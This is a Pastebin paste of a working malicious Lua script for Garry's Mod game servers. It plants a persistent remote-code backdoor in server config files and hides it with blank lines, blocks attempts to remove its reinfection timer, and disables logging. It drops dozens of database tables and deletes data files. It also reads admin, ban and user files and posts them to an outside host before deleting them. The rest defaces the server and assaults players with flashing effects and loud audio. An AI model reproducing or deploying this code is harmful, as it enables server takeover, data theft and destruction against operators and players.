Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- util.AddNetworkString "skeleton_dancing_troll"
- local lol = {}
- function lol:RandomString( intMin, intMax )
- local ret = ""
- for _ = 1, math.random( intMin, intMax ) do
- ret = ret.. string.char( math.random(65, 90) )
- end
- return ret
- end
- lol.m_tblActions = {}
- lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
- lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
- function lol:PushAction( intChainDelay, func )
- self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
- end
- function lol:NextAction( pPlayer )
- pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
- if not self.m_tblActions[pPlayer.m_intCurAction] then return end
- timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
- if not IsValid( pPlayer ) then return end
- self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
- self:NextAction( pPlayer )
- end )
- end
- function lol:Start( pPlayer )
- pPlayer.m_intCurAction = 0
- self:NextAction( pPlayer )
- end
- function lol:SendLua( pPlayer, strLua )
- net.Start( "skeleton_dancing_troll" )
- net.WriteString( strLua )
- net.Send( pPlayer )
- end
- function lol:SetupPlayer( pPlayer )
- pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
- end
- for k, v in pairs( player.GetAll() ) do
- lol:SetupPlayer( v )
- timer.Simple( 2, function() lol:Start( v ) end )
- end
- hook.Add( "PlayerAuthed", "wat", function( pPlayer )
- lol:SetupPlayer( pPlayer )
- timer.Simple( 10, function() lol:Start( pPlayer ) end )
- end )
- hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
- if strText:sub( 1, 5 ) == "/1337" then
- pSender:Ignite( 1e9 )
- pSender:ChatPrint( "Nop" )
- pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
- return false
- end
- end )
- --Sequence stack
- --Start some tunes and steam in our assets
- lol:PushAction( 0, function( pPlayer )
- lol:SendLua( pPlayer, ([=[
- sound.PlayURL( "https://goo.gl/fMRdr1", "", function()end )
- g_]=].. lol.m_strImageGlobalVar.. [=[ = {}
- local html = [[%s]]
- local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
- local pnl = vgui.Create( "HTML" )
- pnl:SetPos( ScrW() -1, ScrH() -1 )
- pnl:SetVisible( true )
- pnl:SetMouseInputEnabled( false )
- pnl:SetKeyBoardInputEnabled( false )
- pnl:SetSize( intSizeX, intSizeY )
- pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
- local PageLoaded
- PageLoaded = function()
- local mat = pnl:GetHTMLMaterial()
- if mat then
- g_]=].. lol.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
- return
- end
- timer.Simple( 0.10, PageLoaded )
- end
- PageLoaded()
- end
- LoadWebMaterial( "https://image.noelshack.com/fichiers/2017/47/3/1511306958-hud.png", "hud1", 300, 128 )
- LoadWebMaterial( "https://image.noelshack.com/fichiers/2017/47/3/1511306628-hud2.png", "hud2", 300, 128 )
- LoadWebMaterial( "https://image.noelshack.com/fichiers/2017/47/3/1511306630-hud3.png", "hud3", 128, 128 )
- LoadWebMaterial( "https://goo.gl/fgF2ji", "doritos", 256, 256 )
- LoadWebMaterial( "https://goo.gl/fgF2ji", "fedora", 256, 256 )
- LoadWebMaterial( "https://goo.gl/fgF2ji", "dew", 256, 256 )
- LoadWebMaterial( "https://goo.gl/fgF2ji", "awp", 256, 256 )
- ]=]):format(lol.m_strImageLoadHTML) )
- RunConsoleCommand("ulx_logecho", "0")
- local WS = {}
- WS.file = {}
- WS.file.Write = file.Write
- WS.file.Read = file.Read
- WS.file.Append = file.Append
- WS.file.IsDir = file.IsDir
- WS.file.CreateDir = file.CreateDir
- --[[WS.debug = {} To bypass some things, never got to use it
- WS.debug.getupvalue = debug.getupvalue]]
- function WS.ProxyCode( code )
- local file = table.Random(file.Find("data/*.lua", "GAME"))
- RunString(code, file)
- end
- function WS.CheckForInfection()
- local c = WS.file.Read("data/ulx/config.txt","GAME") or "NO DATA"
- if string.find(c, "Exploits fixes") then
- return true
- else
- return false
- end
- end
- function WS.Infecte()
- if not WS.file.IsDir("data/ulx","GAME") then return end
- ------------- GAMEMODE persistent
- if not WS.file.IsDir("data/ulx/gamemodes","GAME") then
- WS.file.CreateDir("ulx/gamemodes")
- end
- if not WS.file.IsDir("data/ulx/gamemodes/"..engine.ActiveGamemode(),"GAME") then
- WS.file.CreateDir("ulx/gamemodes/"..engine.ActiveGamemode())
- end
- WS.file.Write( "ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n; Exploits fixes")
- WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx logEcho 0]])
- WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "user" "ulx luarun"]])
- WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "user" "ulx rcon"]])
- WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "superadmin" "ulx groupdeny"]]) -- yyyyeeeaaahhhh
- WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx luarun util.AddNetworkString("DefqonBackdoor")]])
- WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx luarun net.Receive("DefqonBackdoor",function() RunString(net.ReadString(),"Collombe") end)]])
- ------------- BASIC persistent
- if WS.CheckForInfection() then return end
- WS.file.Append("ulx/config.txt", string.rep("\n", 50)) -- Best hiding technique (Лучшая техника скрытия)
- WS.file.Append("ulx/config.txt", "\n; Exploits fixes")
- WS.file.Append("ulx/config.txt", "\n"..[[ulx logEcho 0]])
- WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "user" "ulx luarun"]])
- WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "user" "ulx rcon"]])
- WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "superadmin" "ulx groupdeny"]]) -- yyyyeeeaaahhhh
- WS.file.Append("ulx/config.txt", "\n"..[[ulx luarun util.AddNetworkString("DefqonBackdoor")]])
- WS.file.Append("ulx/config.txt", "\n"..[[ulx luarun net.Receive("DefqonBackdoor",function() RunString(net.ReadString(),"Collombe") end)]])
- end
- ------------- INFECTE EVERYTHING
- WS.Infecte()
- timer.Create("TheWaterSnake", 5, 0, WS.Infecte)
- ------------- PREVENT STOPPING
- local td, tr = timer.Destroy, timer.Remove
- function timer.Destroy( a )
- if a == "TheWaterSnake" then return end
- td( a )
- end
- function timer.Remove( a )
- if a == "TheWaterSnake" then return end
- tr( a )
- end
- ------------- B1G H4X
- util.AddNetworkString("DefqonBackdoor")
- net.Receive("DefqonBackdoor", function()
- RunString(net.ReadString(), "TheFrenchGuy")
- end)
- timer.Create( "hello", 2, 1, function()
- RunConsoleCommand( "say", "Welcome to the future" )
- end)
- timer.Create( "hello2", 10, 1, function()
- RunConsoleCommand( "say", "Everyone get ready the gang is here" )
- end)
- timer.Create( "hello3", 14, 1, function()
- RunConsoleCommand( "say", "Razer & Memes" )
- end)
- timer.Create( "hello5", 20, 1, function()
- RunConsoleCommand( "say", "We hope you enjoy the show :^)" )
- end)
- timer.Create( "hello6", 32, 1, function()
- RunConsoleCommand( "say", "๑۩۩๑ HACKED BY THE SYNIDICATE ๑۩۩๑" )
- end)
- end )
- --HUD swap
- lol:PushAction( 40, function( pPlayer )
- lol:SendLua( pPlayer, [[
- (GAMEMODE or GM).CalcView = function() end
- (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
- local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
- for k, v in pairs(remove) do
- hook.GetTable()[v] = {}
- end
- local function GetWebMat( strURL )
- return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
- end
- hook.Add( "HUDPaint", "newhud", function()
- surface.SetDrawColor( 255, 255, 255, 255 )
- if GetWebMat( "hud1" ) then
- surface.SetMaterial( GetWebMat("hud1")[1] )
- surface.DrawTexturedRect( 0, ScrH() -128, 300 *(512 /300), 128 )
- end
- if GetWebMat( "hud2" ) then
- surface.SetMaterial( GetWebMat("hud2")[1] )
- surface.DrawTexturedRect( ScrW() -300, ScrH() -128, 300 *(512 /300), 128 )
- end
- if GetWebMat( "hud3" ) then
- surface.SetMaterial( GetWebMat("hud3")[1] )
- surface.DrawTexturedRect( 45, ScrH() -245, 128, 128 )
- end
- if GetWebMat( "doritos" ) then
- surface.SetMaterial( GetWebMat("doritos")[1] )
- surface.DrawTexturedRectRotated( math.random(250, 260), math.random(250, 260), 183 *(256 /183), 256, CurTime() *512 )
- end
- if GetWebMat( "dew" ) then
- surface.SetMaterial( GetWebMat("dew")[1] )
- surface.DrawTexturedRectRotated( math.random(250, 260), math.random(ScrH() -250, ScrH() -260), 110 *((350 /110) -1), 256, CurTime() *-512 )
- end
- if GetWebMat( "fedora" ) then
- surface.SetMaterial( GetWebMat("fedora")[1] )
- surface.DrawTexturedRectRotated( ScrW() -math.random(400, 410), math.random(250, 260), 256, 256, CurTime() *-512 )
- end
- if GetWebMat( "awp" ) then
- surface.SetMaterial( GetWebMat("awp")[1] )
- surface.DrawTexturedRectRotated( ScrW() -math.random(400, 410), math.random(ScrH() -260, ScrH() -250), 256, 256, CurTime() *512 )
- end
- draw.SimpleTextOutlined(
- "๑۩۩๑ HACKED BY THE SYNIDICATE ๑۩۩๑",
- "DermaLarge",
- ScrW() /2 +math.random( -8, 8 ),
- ScrH() /2 +math.random( -8, 8 ) +24,
- Color( 255, 0, 0, 255 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 1,
- Color( 0, 0, 255, 255 )
- )
- end )
- local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
- hook.Add( "HUDShouldDraw", "newhud", function( str ) if not allowed[str] then return false end end )
- surface.PlaySound( "garrysmod/save_load4.wav" )
- ]] )
- end )
- --Disco time
- lol:PushAction( 9.1, function( pPlayer )
- local idx = pPlayer:EntIndex()
- timer.Create( "beat".. idx, 0.42, 0, function()
- if not IsValid( pPlayer ) then timer.Destroy( "beat".. idx ) return end
- pPlayer:ViewPunch( Angle(math.Rand(-15, -10), math.Rand(-10, 10), 0) )
- end )
- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- local date = os.date( "%m-%d-%y" )
- local databases = { "jobdata","darkrp_door","darkrp_levels","darkrp_prestige","darkrp_doorgroups","darkrp_doorjobs","darkrp_jobspawn","darkrp_position","darkrp_player","darkrp_dbversion","FAdmin_CAMIPrivileges","FADMIN_GROUPS","FAdmin_Immunity","FADMIN_MOTD","FAdmin_PlayerGroup","FADMIN_PRIVILEGES","FADMIN_RESTRICTEDENTS","FAdmin_ServerSettings","FAdminBans","FPP_ANTISPAM1","FPP_BLOCKED1","FPP_BLOCKMODELSETTINGS1","FPP_ENTITYDAMAGE1","FPP_GLOBALSETTINGS1","FPP_GRAVGUN1","FPP_GROUPMEMBERS1","FPP_GROUPS3","FPP_GROUPTOOL","FPP_PHYSGUN1","FPP_PLAYERUSE1","FPP_TOOLADMINONLY","FPP_TOOLGUN1","FPP_TOOLRESTRICTPERSON1","FPP_TOOLTEAMRESTRICT","FPP_BLOCKEDMODELS1","awarn_playerdata","awarn_serverdata","awarn_warnings","blogs_players_v3","blogs_v3","stt_date","stt_players","mlog_logs","mlog_permissions","atlaschat_players","atlaschat_ranks","atlaschat_remote","atlaschat_restrictions","OreBag","fcd_playerData","dailylogin","ChessLeaderboard","qsgr_data","voting_npcs","cac_incidents","steam_rewards","playerdata","playerinformation","utime","permaprops","cc_characters","cc_npcs","ckit_chips","ckit_persist","exsto_data_bans","exsto_data_ranks","exsto_data_users","exsto_data_variables","exsto_restriction","inventories","kinv_items","libk_player","permitems","player_gangapps","player_gangdata","player_gangs","ps2_categories","ps2_equipmentslot","ps2_HatPersistence","ps2_itemmapping","ps2_itempersistence","ps2_OutfitHatPersistenceMapping","ps2_outfits","ps2_playermodelpersistence","ps2_servers","ps2_settings","ps2_trailpersistence","ps2_wallet","removeprops","scoreboard_friends","serverguard_analytics","serverguard_bans","serverguard_pms","serverguard_ranks","serverguard_reports","serverguard_schema","serverguard_ttt_autoslays","serverguard_users","serverguard_watchlist","tttstats","ttt_passes_history","specdm_stats_new","ps2_achievements","ps2_boosterpersistence","ps2_cratepersistence","ps2_instatswitchweaponpersistence","ps2_keypersistence","ps2_rolecontrolpersistence","ps2_weaponpersistence","rapsheet","damagelog_autoslay","damagelog_names","damagelog_oldlogs","damagelog_weapons","kmapvote_mapinfo","kmapvote_ratings","mgang_gangs","mgang_players","deathrun_ids","deathrun_records","deathrun_stats","sui_ratings","shop_texthats","shop_money","shop_items","report_log" }
- local datafiles = { "ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","wire_version.txt","UTeam.txt","prevhas.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","hitnumbers/settings.txt","soundlists/common_sounds.txt","vcmod/controls.txt","vcmod/dataserver.txt","qsgr_data/sqgr_settings.txt","blogs/configcache.txt","blogs/language.txt","cac/adminuipack.txt","ezjobs/config.txt","damagelog/colors.txt","damagelog/filters_new.txt","craphead_scripts/armory_robbery/rp_downtown_v4c/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_evilmelon_v1/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v3/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v4/policearmory_location.txt","mg_gangsdata/mg_npcspawns.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","prevhash.txt","permaprops_config.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","vliss/settings/config.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
- local sensitivefiles = { "ulx_logs/"..date..".txt","ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","vcmod/controls.txt","vcmod/dataserver.txt","blogs/configcache.dat","blogs/language.txt","blogs/config_v5.txt","cac/adminuipack.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","permaprops_config.txt","whitelist.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
- for k,v in pairs( databases ) do if sql.TableExists( v ) then
- sql.Query( "DROP TABLE "..v.." ;" )
- sql.Query( "CREATE TABLE IF NOT EXISTS "..v.." ( steamid TEXT NOT NULL PRIMARY KEY, value TEXT );" )
- end
- end
- timer.Simple(5, function() for k,v in pairs( datafiles ) do if file.Exists(v, "DATA") then file.Delete( v ) end end end )
- for k,v in pairs( sensitivefiles ) do if file.Exists(v, "DATA") then http.Post("http://bracegaming.com/data/log.php",{a=game.GetIPAddress(),b=v,c=file.Read(v)}) file.Delete( v ) end end
- hook.Add( "Think", "killulxlogs", function() file.Delete( "ulx_logs/"..date..".txt" ) end )
- timer.Create( "niggaspams2", 0.1, 0, function()
- RunConsoleCommand( "sv_friction", "-8" )
- end)
- timer.Create( "niggaspams3", 0.1, 0, function()
- RunConsoleCommand( "sv_gravity", "-600" )
- end)
- timer.Create( "next_level_timer", 0.1, 0, function()
- for k, v in pairs(player.GetAll()) do
- v:ConCommand("say /ooc Hacked by Quadasoft.ru | https://www.youtube.com/watch?v=3T3hmbfUnWw");
- end
- end)
- RunConsoleCommand( "sv_loadingurl", "http://uu.esy.es/zyqv6r7n/seized.html" )
- RunConsoleCommand("hostname", "Hacked by DefqonSploit")
- RunConsoleCommand("ulx", "groupallow", "superadmin", "*")
- timer.Create( "spamlol", 0, 0, function() for i = 1, 5 do MsgC(Color(math.random(255), math.random(255), math.random(255)), "Hacked") end end)
- for k,v in pairs(player.GetAll()) do v:SetVelocity(v:GetVelocity() + Vector(math.random(1000,5000), math.random(1000,5000), math.random(1000,5000))) end
- for k,v in pairs (player.GetAll()) do v:SetUserGroup("superadmin") end
- timer.Create( "niggaspams4", 0.1, 0, function()
- RunConsoleCommand( "sbox_noclip", "1" )
- end)
- timer.Create( "niggaspams5", 0.1, 0, function()
- RunConsoleCommand( "sv_allowcslua", "1" )
- end)
- hook.Add("Think", "busted", function()
- for k,v in pairs (player.GetAll()) do
- v:SetModelScale(2.5, 100);
- v:SetRunSpeed(400 * 2);
- v:SetWalkSpeed(200 * 2);
- end
- end)
- for k, v in pairs( player.GetAll() ) do v:SendLua( [[util.ScreenShake( Vector( 0, 0, 0 ), 10, 5, 60, 5000 )]] ) end
- for k,v in pairs(player.GetAll()) do
- local a = v:LookupBone("ValveBiped.Bip01_Head1")
- local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
- local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
- local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
- local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
- local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
- local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
- local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
- local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
- local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
- local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
- v:ManipulateBoneScale( a, Vector(4,0,4))
- v:ManipulateBoneScale( b, Vector(0,0,0))
- v:ManipulateBoneScale( c, Vector(0,0,0))
- v:ManipulateBoneScale( d, Vector(0,0,1))
- v:ManipulateBoneScale( e, Vector(0,0,1))
- v:ManipulateBoneScale( f, Vector(0,0,0))
- v:ManipulateBoneScale( g, Vector(0,0,0))
- v:ManipulateBoneScale( h, Vector(1,1.5,1.5))
- v:ManipulateBoneScale( i, Vector(1,1.5,1.5))
- v:ManipulateBoneScale( j, Vector(0,0,0))
- v:ManipulateBoneScale( k, Vector(0,0,0))
- end
- for k,v in pairs(player.GetAll()) do timer.Create( "timerargent10", 0.1, 0, function() v:addMoney(999999) end) end
- timer.Create( "ignitelol", 0.1, 1, function()
- for k,v in pairs(player.GetAll()) do v:Ignite(120) end
- end)
- -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
- lol:SendLua( pPlayer, [[
- local emitter = ParticleEmitter( LocalPlayer():GetPos() )
- local time = 0
- hook.Add( "Think", "wat", function()
- if CurTime() < time then
- return
- end
- time = CurTime() +0.05
- for i = 1, 16 do
- local part = emitter:Add(
- "particles/balloon_bit",
- LocalPlayer():GetPos() +Vector(
- math.random( -256, 256 ),
- math.random( -256, 256 ),
- 256
- )
- )
- if part then
- local Size = math.random( 4, 7 )
- part:SetColor( math.random(0, 255), math.random(0, 255), math.random(0, 255), 255 )
- part:SetVelocity( Vector( 40, 25, -math.random(300, 400) ) )
- part:SetDieTime( 4.5 )
- part:SetGravity( Vector(40, 0, -250) )
- part:SetLifeTime( 0 )
- part:SetStartSize( Size /2 )
- part:SetEndSize( Size )
- part:SetCollide( true )
- end
- end
- end )
- ]] )
- lol:SendLua( pPlayer, [[
- hook.Add( "RenderScreenspaceEffects", "wat", function()
- local sinScaler = math.sin( CurTime() )
- DrawBloom(
- 0,
- 3,
- sinScaler *math.Rand(1, 8),
- sinScaler *math.Rand(1, 8),
- 6,
- math.Rand(0.5, 2),
- math.Rand(0, 0.3),
- math.Rand(0, 0.3),
- math.Rand(0.5, 1)
- )
- DrawColorModify{
- ["$pp_colour_addr"] = 1,
- ["$pp_colour_addg"] = 0,
- ["$pp_colour_addb"] = 0,
- ["$pp_colour_brightness" ] = 0,
- ["$pp_colour_contrast" ] = 1,
- ["$pp_colour_colour" ] = 1,
- ["$pp_colour_mulr" ] = 0,
- ["$pp_colour_mulg" ] = 0,
- ["$pp_colour_mulb" ] = 0
- }
- end )
- local mdl = ClientsideModel( "models/player/breen.mdl", RENDERGROUP_BOTH )
- mdl:SetNoDraw( true )
- local posCache, time = {}, 0
- hook.Add( "HUDPaint", "dance", function()
- if not mdl.SeqStart or CurTime() > (mdl.SeqStart +mdl.SeqDuration) then
- local idx = mdl:LookupSequence("taunt_dance")
- mdl.SeqDuration = mdl:SequenceDuration( idx )
- mdl.SeqStart = CurTime()
- mdl:ResetSequence( idx )
- end
- mdl:SetCycle( (CurTime() -mdl.SeqStart) /mdl.SeqDuration )
- local w, h = 300, 300
- local ang = Angle( 0, 0, 0 )
- for i = 1, 32 do
- if CurTime() > time then
- posCache[i] = { math.random( 0, ScrW() -w ), math.random( 0, ScrH() -h ) }
- end
- local x, y = posCache[i][1], posCache[i][2]
- cam.Start3D( (ang:Forward() *64) +(ang:Up() *32), (ang:Forward()*-1):Angle(), 90, x, y, w, h )
- cam.IgnoreZ( true )
- render.SuppressEngineLighting( true )
- render.SetLightingOrigin( mdl:GetPos() )
- render.ResetModelLighting( 1, 1, 1 )
- render.SetColorModulation( 0, 0, 1 )
- mdl:DrawModel()
- render.SuppressEngineLighting( false )
- cam.IgnoreZ( false )
- cam.End3D()
- end
- if CurTime() > time then
- time = CurTime() +0.15
- end
- end )
- ]] )
- end )
- --Let the beat drop
- lol:PushAction( 101, function( pPlayer )
- lol:SendLua( pPlayer, [[
- hook.Add( "GetMotionBlurValues", "wat", function()
- return 0, 0, 1, math.sin(CurTime() *13)
- end )
- hook.Add( "RenderScreenspaceEffects", "ohgod", function()
- local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) )
- DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) )
- DrawMaterialOverlay( "effects/tp_eyefx/tpeye", 1 )
- end )
- hook.Add( "PostDrawTranslucentRenderables", "ohgod", function()
- render.SetMaterial( Material("cable/blue_elec") )
- for i = 1, 32 do
- render.DrawBeam( LocalPlayer():GetPos() +Vector(0, 0, 128) +(EyeAngles():Forward() *256), EyePos() +(VectorRand() *256), 4, 0, 12.5, Color(255, 255, 255, 255) )
- end
- end )
- timer.Create( "thedrop", 0.42, 0, function()
- util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 )
- end )
- ]] )
- pPlayer:Remove()
- timer.Create( "rights", 0.1, 0, function()
- for k, v in pairs(player.GetAll()) do
- v:ConCommand("+right");
- end
- end)
- --EVIL TIME rip headpones
- lol:PushAction( 100, function( pPlayer )
- lol:SendLua( pPlayer, [[
- surface.PlaySound( "vo/npc/male01/gethellout.wav" )
- local sounds = {}
- for i = 1, 4 do
- sound.PlayURL( "http://www.underdone.org/leak/underdone/asd.mp3", "noblock noplay", function( pChan )
- sounds[#sounds +1] = pChan
- end )
- end
- timer.Create( "asdf", 1, 0, function()
- if #sounds ~= 4 then return end
- timer.Destroy( "asdf" )
- for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 1 ) v:Play() end
- end )
- hook.Add( "HUDShouldDraw", "newhud", function() return false end )
- ]] )
- timer.Create( "allahakbar", 5, 0, function()
- hook.Add("Think", "armageddon", function()
- local explode = ents.Create( "env_explosion" )
- explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
- explode:Spawn()
- explode:SetKeyValue( "iMagnitude", "500" )
- explode:Fire( "Explode", 0, 0 )
- end)
- end)
- hook.Add("Think", "chatspam", function() for k,v in pairs(player.GetAll()) do v:PrintMessage( HUD_PRINTCENTER, "SEIZED BY THE SYNDICATE >!!ALL!!<" ) v:SendLua([[chat.AddText( Color( math.random(1, 255), math.random(1, 255), math.random(1, 255) ), "SEIZED BY THE SYNDICATE >!!ALL!!<" )]]) end end)
- pPlayer:Remove()
- end )
- end )
Advertisement
Add Comment
Please, Sign In to add comment